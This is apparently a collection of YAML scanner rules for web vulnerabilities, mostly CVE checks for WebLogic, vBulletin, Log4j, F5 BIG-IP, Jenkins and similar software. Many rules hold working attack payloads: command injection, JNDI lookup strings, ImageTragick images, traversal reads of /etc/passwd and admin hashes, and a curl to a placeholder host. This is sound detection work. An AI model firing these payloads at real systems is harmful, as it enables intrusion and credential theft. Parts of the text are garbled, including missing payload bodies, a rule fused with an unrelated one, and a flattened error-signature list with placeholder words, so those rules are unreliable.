# still routes the request to the real target.
# NOTE(review): the body is form-encoded while Content-Type says text/xml;
# confirm the endpoint parses the fields with that content type.
send:
  - method: 'POST'
    url: '/password_change.cgi'
    headers:
      - HOST: 127.0.0.1
      - REFERER: http://127.0.0.1:10000/session_login.cgi
      - CONTENT-TYPE: text/xml
    body: 'user=rootxx&pam=&expired=2&old=test|getent hosts DNS_MARKER&new1=test2&new2=test2'

detect:
  - oob:
    - dns

meta-info:
  - type: rce
  - threat: 98
  - applicable_for:
    - fast
    - scanner
  - tags:
    - RCE
    - CVE-2019-15107
    - Webmin <= 1.920

--------------------------------------------------------------------------------
/CVE-2019-16759.yaml:
--------------------------------------------------------------------------------
# vBulletin CVE-2019-16759 check: POST to '/' with routestring
# ajax/render/widget_php and a widgetConfig[code] value that runs
# `getent hosts DNS_MARKER`. Detection is out-of-band DNS only.
send:
  - method: 'POST'
    url: '/'
    headers:
      - CONTENT-TYPE: application/x-www-form-urlencoded
    body: "routestring=ajax/render/widget_php&widgetConfig[code]=echo+shell_exec('getent hosts DNS_MARKER');+exit;"

detect:
  - oob:
    - dns

meta-info:
  - type: rce
  - threat: 98
  - applicable_for:
    - fast
    - scanner
  - tags:
    - RCE
    - CVE-2019-16759
    - vBulletin 5.x pre-auth RCE

--------------------------------------------------------------------------------
/CVE-2019-19781-Citrix-ADC-Netscaler.yaml:
--------------------------------------------------------------------------------
# Citrix ADC / Gateway CVE-2019-19781 check: two GETs through the
# /vpn/../vpns/ traversal. The only detect pattern matches smb.conf content,
# so in practice the second request is the one that can produce a hit; the
# first has no matching pattern in this file.
# The probe is read-only (no command is executed on the appliance).
send:
  - method: 'GET'
    url: '/vpn/../vpns/services.html'

  - method: 'GET'
    url: '/vpn/../vpns/cfg/smb.conf'

detect:
  - response:
    - body: 'name resolve order =.*lmhosts'

meta-info:
  - type: ptrav
  - threat: 98
  - applicable_for:
    - fast
    - scanner
  - tags:
    - Path Traversal
    - Citrix ADC
    - Citrix Gateway
    - NetScaler
    - CVE-2019-19781

--------------------------------------------------------------------------------
/CVE-2019-2725.yaml:
--------------------------------------------------------------------------------
# Oracle WebLogic CVE-2019-2725 check: two POSTs to
# /_async/AsyncResponseServiceHttps (a bash/curl form and a cmd/ping form),
# detected through an out-of-band DNS lookup of DNS_MARKER.
# NOTE(review): Content-Type is text/xml but the body values contain no XML
# markup; it appears to have been lost when this page was captured, so the
# bodies cannot be used as shown.
send:
  - method: 'POST'
    url: '/_async/AsyncResponseServiceHttps'
    headers:
      - CONTENT-TYPE: text/xml
    body: 'xxxxbash-ccurl http://DNS_MARKER '

  - method: 'POST'
    url: '/_async/AsyncResponseServiceHttps'
    headers:
      - CONTENT-TYPE: text/xml
    body: 'xxxxcmd/cping DNS_MARKER '

detect:
  - oob:
    - dns

meta-info:
  - type: rce
  - threat: 98
  - applicable_for:
    - fast
    - scanner
  - tags:
    - RCE
    - Remote Code Execution
    - CVE-2019-2725
    - Oracle
    - Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0
--------------------------------------------------------------------------------
/CVE-2019-3396.yaml:
--------------------------------------------------------------------------------
# Atlassian Confluence CVE-2019-3396 check: POST to the macro preview endpoint
# with a widget macro whose _template parameter points at file:///etc/passwd;
# flagged when the response body contains a passwd-format line.
# The probe is read-only. The contentId value is fixed in the rule;
# NOTE(review): confirm the check does not depend on that page id existing.
send:
  - method: 'POST'
    url: '/rest/tinymce/1/macro/preview'
    headers:
      - CONTENT-TYPE: application/json
    body: '{"contentId":"65592","macro":{"name":"widget","params":{"url": "https://www.youtube.com/watch?v=0rX-Cp3Hzn4","width":"1000","height":"1000","_template":"file:///etc/passwd"},"body":""}}'

detect:
  - response:
    - body: '[a-z]*:[^:]*:[0-9]*:[0-9]*:[^:]*:\/[^:]*:\/[^:]*'

meta-info:
  - type: ptrav
  - threat: 98
  - applicable_for:
    - fast
    - scanner
  - tags:
    - Path Traversal
    - CVE-2019-3396
    - Atlassian
    - Confluence
    - Widget Connector Macro - Velocity Template Injection
--------------------------------------------------------------------------------
/CVE-2019-5418.yaml:
--------------------------------------------------------------------------------
# Rails CVE-2019-5418 (file content disclosure) check: replaces the Accept
# request header with a traversal to /etc/passwd followed by '{{' and flags
# the target when the response body contains a passwd-format line.
# The probe is read-only. No applicable_for entry is set in this rule.
generate:
  - into:
    - 'HEADER_ACCEPT'
  - payload:
    - '../../../../../../../../../../etc/passwd{{'
  - method:
    - replace
detect:
  - response:
    - body: '[a-z]*:[^:]*:[0-9]*:[0-9]*:[^:]*:\/[^:]*:\/[^:]*'
meta-info:
  - type: ptrav
  - threat: 80
  - tags:
    - Path Traversal
    - Arbitrary File Reading
    - Misconfiguration
    - Directory Listing
    - Insecure Direct Object References
    - Broken Access Control
    - OWASP
    - OWASP Top-10
    - A4:2010
    - A4:2013
    - A5:2017
    - CVE-2019-5418
    - File Content Disclosure on Rails

--------------------------------------------------------------------------------
/CVE-2019-8451.yaml:
--------------------------------------------------------------------------------
# Jira CVE-2019-8451 (SSRF) check: GET to the gadgets makeRequest servlet with
# a url parameter of the form http://127.0.0.1@DNS_MARKER/, plus a Host header
# of 127.0.0.1 and X-Atlassian-Token: no-check. A hit is an out-of-band DNS
# lookup of DNS_MARKER, i.e. the server tried to reach the host after the '@'.
# NOTE(review): Host is hard-coded to 127.0.0.1; confirm the scanner still
# routes the request to the real target.
send:
  - method: 'GET'
    url: '/plugins/servlet/gadgets/makeRequest?url=http://127.0.0.1@DNS_MARKER/'
    headers:
      - Host: 127.0.0.1
      - X-Atlassian-Token: no-check

detect:
  - oob:
    - dns

meta-info:
  - type: ssrf
  - threat: 95
  - tags:
    - SSRF
    - CVE-2019-8451

--------------------------------------------------------------------------------
/CVE-2020-14882_WebLogic_RCE.yaml:
--------------------------------------------------------------------------------
# Oracle WebLogic CVE-2020-14882 check: two GETs to console.portal through a
# double-encoded '../' under /console/images/. The first asks for
# `getent hosts DNS_MARKER`, the second makes the server fetch
# http://DNS_MARKER/test.xml. Both are detected through an out-of-band DNS
# lookup, so a host without outbound name resolution would presumably be
# missed.
send:
  - method: 'GET'
    url: "/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec('getent%20hosts%20DNS_MARKER');%22);"

  - method: 'GET'
    url: '/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLable=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://DNS_MARKER/test.xml");'

detect:
  - oob:
    - dns

meta-info:
  - type: rce
  - threat: 98
  - title: "Remote code execution in Oracle WebLogic Server (CVE-2020-14882)"
  - description: "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server."
  - additional: "For more information, see https://www.oracle.com/security-alerts/cpuoct2020.html"
  - applicable_for:
    - fast
    - scanner
  - tags:
    - RCE
    - CVE-2020-14882
    - Oracle WebLogic

--------------------------------------------------------------------------------
/CVE-2020-5902_F5_BIG-IP.yaml:
--------------------------------------------------------------------------------
# F5 BIG-IP CVE-2020-5902 check: two GETs through the '/tmui/login.jsp/..;/'
# path, one reading /etc/passwd via fileRead.jsp and one running
# `list auth user admin` via tmshCmd.jsp. Flagged on a passwd-format line or
# on tmsh output that includes an encrypted-password field.
# NOTE(review): inside a single-quoted YAML scalar `\\/` stays two
# backslashes, so the first pattern requires a literal backslash before each
# slash (as in JSON-escaped output). CVE-2019-5418.yaml uses `\/` for the
# same passwd pattern. Confirm this form matches what fileRead.jsp returns.
# NOTE(review): a hit on the second pattern means password hashes were
# returned to the scanner; handle stored responses accordingly.
send:
  - method: 'GET'
    url: '/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'

  - method: 'GET'
    url: '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'

detect:
  - response:
    - body: '[a-z]*:[^:]*:[0-9]*:[0-9]*:[^:]*:\\/[^:]*:\\/[^:]*'
    - body: '"output":"auth\suser\sadmin.*encrypted-password'

meta-info:
  - title: "Remote Code Execution (RCE) vulnerability in F5 BIG-IP (CVE-2020-5902)"
  - description: "In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages."
  - additional: "For more information see https://support.f5.com/csp/article/K52145254"
  - type: rce
  - threat: 98
  - applicable_for:
    - fast
    - scanner
  - tags:
    - CVE-2020-5902
    - F5 BIG-IP

--------------------------------------------------------------------------------
/CVE-2021-44228_Log4j_rce.yaml:
--------------------------------------------------------------------------------
# Log4j CVE-2021-44228 check: replaces request values with JNDI lookup strings
# (ldap, rmi, dns) that point at DNS_MARKER; a hit is an out-of-band DNS
# lookup of the marker.
# NOTE(review): no `into:` list is given, so the insertion points presumably
# come from the test policy - confirm which request elements are covered.
# NOTE(review): a DNS lookup shows that the string reached a vulnerable lookup
# path, not that code was loaded. Logging is often asynchronous, so the
# callback may arrive after the scanner stops listening.
# NOTE(review): the description below quotes the original advisory text.
# Apache's later guidance treats the log4j2.formatMsgNoLookups setting as an
# incomplete mitigation; check the current Apache Log4j security page and
# prefer upgrading.
generate:
  - payload:
    - '${jndi:ldap://DNS_MARKER}'
    - '${jndi:ldap://DNS_MARKER}/'
    - '${jndi:rmi://DNS_MARKER//}'
    - '${jndi:dns://DNS_MARKER}'
  - method:
    - replace
detect:
  - oob:
    - dns
meta-info:
  - title: "Log4j Remote Code Execution (CVE-2021-44228)"
  - description: 'Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous releases (>2.10) this behavior can be mitigated by setting system property "log4j2.formatMsgNoLookups" to “true” or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code execution by defaulting "com.sun.jndi.rmi.object.trustURLCodebase" and "com.sun.jndi.cosnaming.object.trustURLCodebase" to "false"'
  - applicable_for:
    - attack_rechecker
    - fast
  - threat: 95
  - type: rce
  - tags:
    - Java
    - log4j
    - CVE-2021-44228
    - CWE-502
    - CWE-400
    - CWE-20

--------------------------------------------------------------------------------
/CVE-2021-44228_Log4j_ssti.yaml:
--------------------------------------------------------------------------------
# Same payloads, detect section, title and description as
# CVE-2021-44228_Log4j_rce.yaml. The visible differences are `type: ssti` and
# an applicable_for list limited to attack_rechecker.
# NOTE(review): presumably this copy exists so that attacks classified as
# template injection are also rechecked - confirm. The two files must be kept
# in sync by hand.
# NOTE(review): the description quotes the original advisory text; Apache's
# later guidance treats log4j2.formatMsgNoLookups as an incomplete mitigation,
# so prefer upgrading.
generate:
  - payload:
    - '${jndi:ldap://DNS_MARKER}'
    - '${jndi:ldap://DNS_MARKER}/'
    - '${jndi:rmi://DNS_MARKER//}'
    - '${jndi:dns://DNS_MARKER}'
  - method:
    - replace
detect:
  - oob:
    - dns
meta-info:
  - title: "Log4j Remote Code Execution (CVE-2021-44228)"
  - description: 'Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous releases (>2.10) this behavior can be mitigated by setting system property "log4j2.formatMsgNoLookups" to “true” or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code execution by defaulting "com.sun.jndi.rmi.object.trustURLCodebase" and "com.sun.jndi.cosnaming.object.trustURLCodebase" to "false"'
  - applicable_for:
    - attack_rechecker
  - threat: 95
  - type: ssti
  - tags:
    - Java
    - log4j
    - CVE-2021-44228
    - CWE-502
    - CWE-400
    - CWE-20

--------------------------------------------------------------------------------
/ImageTragick.yaml:
--------------------------------------------------------------------------------
# ImageMagick "ImageTragick" check: replaces uploaded file contents (multipart
# file values) with image-description payloads whose url() either appends a
# `getent hosts DNS_MARKER` command or points directly at DNS_MARKER; a hit is
# an out-of-band DNS lookup.
# A hit means the server handed attacker-supplied content to ImageMagick with
# the relevant coders/delegates enabled. Restricting coders in ImageMagick's
# policy.xml and validating file type before conversion are the usual
# mitigations.
generate:
  - into: 'POST_MULTIPART_.*_FILE_value'
  - payload:
    - !!str |
      push graphic-context
      viewbox 0 0 640 480
      fill 'url(https://example.com/image.jpg"|getent hosts DNS_MARKER")'
      pop graphic-context
    # NOTE(review): the next payload is empty on this page. Its content
    # (several lines, presumably markup) appears to have been lost when the
    # page was captured, so restore it from the upstream file.
    - !!str |

    - !!str |
      push graphic-context
      viewbox 0 0 640 480
      fill 'url(http://DNS_MARKER/)'
      pop graphic-context
detect:
  - oob:
    - dns

meta-info:
  - type: rce
  - threat: 95
  - tags:
    - OS Commanding
    - ImageMagic
    - ImageTragick
    - CVE-2016-3714
    - CVE-2016-3718

--------------------------------------------------------------------------------
/Insecure-cross-domain-policy.yaml:
--------------------------------------------------------------------------------
# Cross-domain policy check: requests /crossdomain.xml and
# /clientaccesspolicy.xml.
# NOTE(review): this listing is truncated inside the detect section. The first
# `body` value below is a fusion of two different rules, and everything from
# the rest of this rule up to the tail of a later rule is missing from the
# page. The tree lists several files before SVN-Data-Leak.yaml, and the
# surviving patterns and tags (SVN index listing, 'SVN Data Leak') belong to
# that later rule. Do not treat the lines after `send` as the cross-domain
# policy detection logic.
send:
  - method: 'GET'
    url: '/crossdomain.xml'

  - method: GET
    url: '/clientaccesspolicy.xml'

detect:
  - response:
    - body: 'Index of \/\.svn'
    - body: '\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\.\d{6}Z'

meta-info:
  - type: info
  - threat: 30
  - applicable_for:
    - fast
  - tags:
    - SVN Data Leak
    - Information Exposure
--------------------------------------------------------------------------------
/Sandbox-bypass-in-Jenkins.yaml:
--------------------------------------------------------------------------------
# One GET to the checkScriptCompile endpoint with a Groovy snippet in `value`.
# A DNS callback for DNS_MARKER means the snippet ran while the script was
# being compiled (tagged CVE-2019-1003000).
send:
  - method: 'GET'
    url: "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@groovy.transform.ASTTest(value={%20Runtime.getRuntime().exec('getent%20hosts%20DNS_MARKER')%20})%0Aclass%20Person%20{}"

detect:
  - oob:
      - dns

meta-info:
  - type: rce
  - threat: 88
  - applicable_for:
      - fast
  - tags:
      - Jenkins
      - RCE
      - CVE-2019-1003000
--------------------------------------------------------------------------------
/Symfony-debug-panel.yaml:
--------------------------------------------------------------------------------
# Requests the profiler search page and looks for profiler / debug-toolbar
# markup in the body. A hit means debug tooling is reachable on this host.
send:
  - method: 'GET'
    url: '/_profiler/empty/search/results'

detect:
  - response:
      - body: 'Symfony Profiler<\/title>'
      - body: '<title>Profiler<\/title>'
      - body: '<!-- START of Symfony Web Debug Toolbar -->'

meta-info:
  - type: info
  - threat: 67
  - applicable_for:
      - fast
  - tags:
      - Symfony Debug Toolbar
      - Symfony Profiler
--------------------------------------------------------------------------------
/Tango-REST-Misconfiguration.yaml:
--------------------------------------------------------------------------------
# Flags hosts that answer with the TangoREST Basic-auth realm. The match shows
# that the endpoint is exposed and asks for credentials, nothing more.
send:
  - method: 'GET'
    url: 'tango/console'

  - method: 'GET'
    url: 'tango/rest'

detect:
  - response:
      - headers:
          - 'WWW-Authenticate': 'Basic realm="TangoREST"'

meta-info:
  - type: info
  - threat: 25
  - applicable_for:
      - fast
      - scanner
  - tags:
      - TangoREST
      - Misconfiguration
--------------------------------------------------------------------------------
/apache-server-status.yaml:
--------------------------------------------------------------------------------
# Checks whether the Apache status page is served to the scanner.
send:
  - method: 'GET'
    url: '/server-status'

detect:
  - response:
      - body: "Apache Server Status for"

meta-info:
  - type: info
  - threat: 20
  - applicable_for:
      - fast
  - tags:
      - Apache server status
      - Disclosure of technical information
      - CWE-200 Information Exposure
--------------------------------------------------------------------------------
/apache-tapestry.yaml:
--------------------------------------------------------------------------------
# Appends asset paths to each unique URI and reports any response that carries
# an X-Tapestry-ErrorMessage header, whatever its value.
collect:
  - uniq:
      - [ URI ]
generate:
  - into: URI
  - payload:
      - assets/z
      - assets/z/
      - assets/app
      - assets/app/
  - method:
      - postfix
detect:
  - response:
      - headers:
          - 'X-Tapestry-ErrorMessage': '.*'
meta-info:
  - type: info
  - threat: 80
  - tags:
      - Infoleak
      - Apache Tapestry
--------------------------------------------------------------------------------
/apache-tomcat-misconfiguration.yaml:
--------------------------------------------------------------------------------
# Looks for the bundled Tomcat example applications and for the Manager
# application's Basic-auth realm.
# NOTE(review): `headers` is placed under `response` here by analogy with the
# other detects in this set; the page lost the original indentation, so confirm.
send:
  - method: 'GET'
    url: 'manager/html/'

  - method: 'GET'
    url: 'examples/'

  - method: 'GET'
    url: 'examples/jsp/'

detect:
  - response:
      - body: '<title>JSP Examples<\/title>'
      - body: '<title>JSP 2.0 Examples'
      - body: '<title>Apache Tomcat Examples<\/title>'
      - headers:
          - 'WWW-Authenticate': 'Basic realm="Tomcat Manager Application"'

meta-info:
  - type: info
  - threat: 25
  - applicable_for:
      - fast
      - scanner
  - tags:
      - Apache Tomcat
      - Misconfiguration
--------------------------------------------------------------------------------
/app-errors.yaml:
--------------------------------------------------------------------------------
# Sends two malformed values and reports any response body that matches one of
# the error-message signatures listed under `detect`.
# NOTE(review): several signatures further down contain the literal word
# "stuff" (for example "Warning stuff sybase stuff", 'Npgsql\.stuff',
# "PG::StuFError"). They read like placeholders left where a wildcard was
# intended; as written they match only a body containing that exact text.
# Confirm the intended patterns.
# NOTE(review): short generic signatures such as "PostgreSQL", "SQL Server",
# "SQL error", "Server message" and "Stack trace:" also occur in ordinary page
# content, so expect false positives and triage hits before reporting.
# "Data type mismatch in criteria expression" is listed twice.
generate:
  - payload:
      - '%0D%0A%C1%81'
      - "%{1+'f'}"

detect:
  - response:
      - body: 'Error Occurred While Processing Request'
      - body: "Server Error in '.*' Application"
      - body: 'Microsoft OLE DB Provider for ODBC Drivers error'
      # the signature list continues below as printed on the page
11 | - body: 'error in your SQL syntax' 12 | - body: 'Invalid Querystring' 13 | - body: 'Input string was not in a correct format' 14 | - body: 'An illegal character has been found in the statement' 15 | - body: 'ERROR:.*LINE [0-9]+:' 16 | - body: 'Warning:.+ Invalid multibyte sequence' 17 | - body: '<b>Fatal Error<\/b>: (.*)' 18 | - body: '<b>Notice<\/b>: (.*)' 19 | - body: "Warning stuff sybase stuff" 20 | - body: "Sybase stuff Server message stuff" 21 | - body: "Warning stuff sqlite" 22 | - body: 'SQLite\/JDBCDriver' 23 | - body: 'SQLite\.Exception' 24 | - body: 'System\.Data\.SQLite\.SQLiteException' 25 | - body: "PostgreSQL query failed:" 26 | - body: "supplied argument is not a valid PostgreSQL result" 27 | - body: "PostgreSQL.*ERROR" 28 | - body: "Warning stuff pg_ stuff" 29 | - body: "valid PostgreSQL result" 30 | - body: 'Npgsql\.stuff' 31 | - body: "PG::StuFError" 32 | - body: 'java\.sql\.SQLException' 33 | - body: "Oracle error" 34 | - body: "Oracle stuff Driver" 35 | - body: "Warning stuff oci_ stuff" 36 | - body: "Warning stuff ora_ stuff" 37 | - body: 'System\.Data\.OleDb\.OleDbException' 38 | - body: "ODBC SQL Server Driver" 39 | - body: "SQLServer JDBC Driver" 40 | - body: "SqlException" 41 | - body: 'System\.Data\.SqlClient\.SqlException' 42 | - body: "Unclosed quotation mark after the character string" 43 | - body: "Microsoft OLE DB Provider for ODBC Drivers" 44 | - body: "Microsoft OLE DB Provider for SQL Server" 45 | - body: "Incorrect syntax near" 46 | - body: "Sintaxis incorrecta cerca de" 47 | - body: "Syntax error in string in query expression" 48 | - body: "Procedure or function 'ColumnSeek' expects parameter" 49 | - body: "Unclosed quotation mark before the character string" 50 | - body: "Syntax Error (missing operator) in query expression" 51 | - body: "Data type mismatch in criteria expression" 52 | - body: 'ADODB\.Field \(0x800A0BCD\)' 53 | - body: "the used select statements have different number of columns" 54 | - body: "OLE DB stuff 
SQL Server" 55 | - body: "Warningstuff mssql" 56 | - body: "SQL error stuff POS(1234) stuff" 57 | - body: "Warning stuff maxdb stuff" 58 | - body: 'org\.hibernate\.QueryException: unexpected char:' 59 | - body: 'org\.hibernate\.QueryException: expecting' 60 | - body: "Unexpected end of command in statement" 61 | - body: "Warning stuff ingres_" 62 | - body: "Ingres SQLSTATE" 63 | - body: "Ingres stuff Driver" 64 | - body: 'com\.informix\.jdbc' 65 | - body: "Exception stuff Informix" 66 | - body: "Fatal error: Uncaught exception 'MongoCursorException'" 67 | - body: 'MS\.Internal\.Xml\.' 68 | - body: "error '80004005'" 69 | - body: 'Expression must evaluate to a node-set\.' 70 | - body: "A closing bracket expected in" 71 | - body: "An operand in Union Expression does not produce a node-set" 72 | - body: "Cannot convert expression to a number" 73 | - body: "Document Axis does not allow any context Location Steps" 74 | - body: "Empty Path Expression" 75 | - body: "Empty Relative Location Path" 76 | - body: "Empty Union Expression" 77 | - body: "Expected node test or name specification after axis operator" 78 | - body: "Incompatible XPath key" 79 | - body: "Incorrect Variable Binding" 80 | - body: 'A document must contain exactly one root element\.' 81 | - body: "XPathException" 82 | - body: "Unknown error in XPath" 83 | - body: 'org\.apache\.xpath\.XPath' 84 | - body: "libxml2 library function failed" 85 | - body: "xmlsec library function" 86 | - body: "xmlXPathEval: evaluation failed" 87 | - body: 'SimpleXMLElement::xpath\(\)' 88 | - body: "An error occurred in script" 89 | - body: 'Warning: include_once\(\): Failed opening' 90 | - body: "Failed opening required" 91 | - body: "failed to open stream: stuff" 92 | - body: 'MySqlClient\.' 
93 | - body: "Server message" 94 | - body: "SQL error" 95 | - body: "JET Database Engine" 96 | - body: "Procedure or function" 97 | - body: '\[IBM\]\[CLI Driver\]\[DB2' 98 | - body: 'org\.postgresql\.util\.PSQLException' 99 | - body: "Access Database Engine" 100 | - body: "SQLiteException" 101 | - body: "CLI Driver" 102 | - body: "on MySQL result index" 103 | - body: "has occurred in the vicinity of:" 104 | - body: "MySQL server version for the right syntax to use" 105 | - body: 'com\.mysql\.jdbc\.exceptions' 106 | - body: "supplied argument is not a valid MySQL" 107 | - body: 'mssql_query\(\)' 108 | - body: 'mysql_fetch_array\(\)' 109 | - body: "Column count doesn't match value count at row" 110 | - body: "Sybase message" 111 | - body: "SQL Server" 112 | - body: "Dynamic SQL Error" 113 | - body: 'System\.Data\.SqlClient\.' 114 | - body: "DM_QUERY_E_SYNTAX" 115 | - body: 'pg_exec\(\)' 116 | - body: "SQLITE_ERROR" 117 | - body: "PostgreSQL" 118 | - body: 'org\.hsqldb\.jdbc' 119 | - body: "SQL syntax" 120 | - body: "Data type mismatch in criteria expression" 121 | - body: "DB2 SQL error" 122 | - body: "Sybase message:" 123 | - body: "in query expression" 124 | - body: "valid MySQL result" 125 | - body: "Column count doesn't match" 126 | - body: "ODBC Microsoft Access Driver" 127 | - body: 'Roadhouse\.Cms\.' 
128 | - body: "DB2 SQL error:" 129 | - body: "No row with the given identifier" 130 | - body: "open_basedir restriction in effect" 131 | - body: "Cannot execute a blank command in" 132 | - body: "Fatal error: preg_replace" 133 | - body: "Stack trace:" 134 | - body: '\(\) cannot be called statically' 135 | - body: "- not a Class::Method" 136 | - body: '::__toString\(\) must not throw an exception' 137 | - body: "Access to undeclared static property:" 138 | - body: "An iterator cannot be used with foreach by reference" 139 | - body: "Array callback has to contain indices 0 and 1" 140 | - body: "Arrived at end of main loop which shouldn't happen" 141 | - body: "Attempt to destruct pending exception" 142 | - body: "Attempt to unset static property" 143 | - body: 'Balloc\(\) allocation exceeds list boundary' 144 | - body: 'Balloc\(\) failed to allocate memory' 145 | - body: "Base lambda function for closure not found" 146 | - body: "Call to a member function" 147 | - body: "Call to private" 148 | - body: "Call to protected" 149 | - body: "Call to undefined function" 150 | - body: "Call to undefined method" 151 | - body: "Can only throw objects" 152 | - body: "Cannot access empty property" 153 | - body: "Cannot access parent:: when current class scope has no parent" 154 | - body: "Cannot access parent:: when no class scope is active" 155 | - body: "Cannot access property started with" 156 | - body: "Cannot access self:: when no class scope is active" 157 | - body: "Cannot access static:: when no class scope is active" 158 | - body: "Cannot access undefined property for object with overloaded property access" 159 | - body: "Cannot assign by reference to overloaded object" 160 | - body: 'Cannot break\/continue' 161 | - body: "Cannot call abstract method" 162 | - body: "Cannot call constructor" 163 | - body: 'Cannot call forward_static_call\(\) when no class scope is active' 164 | - body: "Cannot call non static method" 165 | - body: "Cannot call overloaded function for 
non-object" 166 | - body: "Cannot call private" 167 | - body: 'Cannot create references to\/from string offsets' 168 | - body: 'Cannot create references to\/from string offsets nor overloaded objects' 169 | - body: "Cannot declare self-referencing constant" 170 | - body: "Cannot destroy active lambda function" 171 | - body: "Cannot get arguments for" 172 | - body: 'Cannot increment\/decrement overloaded objects nor string offsets' 173 | - body: "Cannot instantiate abstract class" 174 | - body: "Cannot instantiate interface" 175 | - body: "Cannot instantiate trait" 176 | - body: "Cannot override final" 177 | - body: "Cannot pass parameter" 178 | - body: "Cannot redeclare" 179 | - body: "Cannot redeclare class" 180 | - body: "Cannot register a reverse output handler conflict outside of MINIT" 181 | - body: "Cannot register an output handler alias outside of MINIT" 182 | - body: "Cannot register an output handler conflict outside of MINIT" 183 | - body: "Cannot resume an already running generator" 184 | - body: "Cannot return string offsets by reference" 185 | - body: "Cannot set non exception as previous exception" 186 | - body: "Cannot unset string offsets" 187 | - body: "Cannot use assign-op operators with overloaded objects nor string offsets" 188 | - body: "Cannot use object as array" 189 | - body: "Cannot use object of type" 190 | - body: "Cannot use string offset as an array" 191 | - body: "Cannot use string offset as an object" 192 | - body: "Cannot yield from finally in a force-closed generator" 193 | - body: "Cannot yield string offsets by reference" 194 | - body: "Class entry requested for an object without PHP class" 195 | - body: "Class name must be a valid object or a string" 196 | - body: 'Corrupted fcall_info provided to zend_call_function\(\)' 197 | - body: 'DCOM has been disabled by your administrator \[com\.allow_dcom=0\]' 198 | - body: "DateFormat class not defined" 199 | - body: "DateTimeInterface can't be implemented by user classes" 200 | - 
body: "EXTREMELY fatal error: jmpbuf unrecoverable; terminating" 201 | - body: "EXTREMELY fatal error: longjmp returned control; terminating" 202 | - body: "Encoding: Attribute" 203 | - body: "Encoding: Can't decode apache map, missing key" 204 | - body: "Encoding: Can't decode apache map, missing value" 205 | - body: "Encoding: Can't decode apache map, only Strings or Longs are allowd as keys" 206 | - body: "Encoding: Cannot find encoding" 207 | - body: "Encoding: Element" 208 | - body: "Encoding: Error calling from_xml callback" 209 | - body: "Encoding: Error calling to_xml callback" 210 | - body: "Encoding: External reference" 211 | - body: "Encoding: Internal Error" 212 | - body: "Encoding: Invalid timestamp" 213 | - body: "Encoding: SoapVar has no 'enc_type' property" 214 | - body: "Encoding: Unresolved reference" 215 | - body: "Encoding: Violation of encoding rules" 216 | - body: "Encoding: Violation of id and ref information items" 217 | - body: "Encoding: object has no" 218 | - body: "Encoding: string" 219 | - body: "Error installing signal handler for" 220 | - body: "Exception thrown without a stack frame" 221 | - body: "Exceptions must be valid objects derived from the Exception base class" 222 | - body: "Failed to clone SpoofChecker object" 223 | - body: "Failed to register IntlDateFormatter class" 224 | - body: "Failed to register MessageFormatter class" 225 | - body: "Failed to register NumberFormatter class" 226 | - body: "Failed to register ResourceBundle class" 227 | - body: "Field width %d is too long" 228 | - body: "First array member is not a valid class name or object" 229 | - body: "Function name must be a string" 230 | - body: "Illegal length modifier specified" 231 | - body: "Illegal offset type" 232 | - body: "Input string is too long" 233 | - body: "Invalid RelaxNG Validation Context" 234 | - body: "Invalid Schema Validation Context" 235 | - body: "Invalid opcode" 236 | - body: "Invalid serialization data for DatePeriod object" 237 | - 
body: "Invalid serialization data for DateTime object" 238 | - body: "Invalid serialization data for DateTimeImmutable object" 239 | - body: "Maximum execution time of" 240 | - body: "Method name must be a string" 241 | - body: "Need to supply an object when throwing an exception" 242 | - body: "Nesting level too deep - recursive dependency" 243 | - body: "NumberFormatter class not defined" 244 | - body: "Object does not support method calls" 245 | - body: "Only variables can be passed by reference" 246 | - body: "PDO: driver" 247 | - body: "Parsing Schema: attribute" 248 | - body: "Parsing Schema: attributeGroup" 249 | - body: "Parsing Schema: can't import schema from" 250 | - body: "Parsing Schema: complexType has no 'name' attribute" 251 | - body: "Parsing Schema: element has both" 252 | - body: "Parsing Schema: element has no 'name' nor 'ref' attributes" 253 | - body: "Parsing Schema: expected" 254 | - body: "Parsing Schema: extension has no 'base' attribute" 255 | - body: "Parsing Schema: group has both 'ref' attribute and subcontent" 256 | - body: "Parsing Schema: group has no 'name' nor 'ref' attributes" 257 | - body: "Parsing Schema: include has no 'schemaLocation' attribute" 258 | - body: "Parsing Schema: missing restriction value" 259 | - body: "Parsing Schema: redefine has no 'schemaLocation' attribute" 260 | - body: "Parsing Schema: restriction has no 'base' attribute" 261 | - body: "Parsing Schema: simpleType has no 'name' attribute" 262 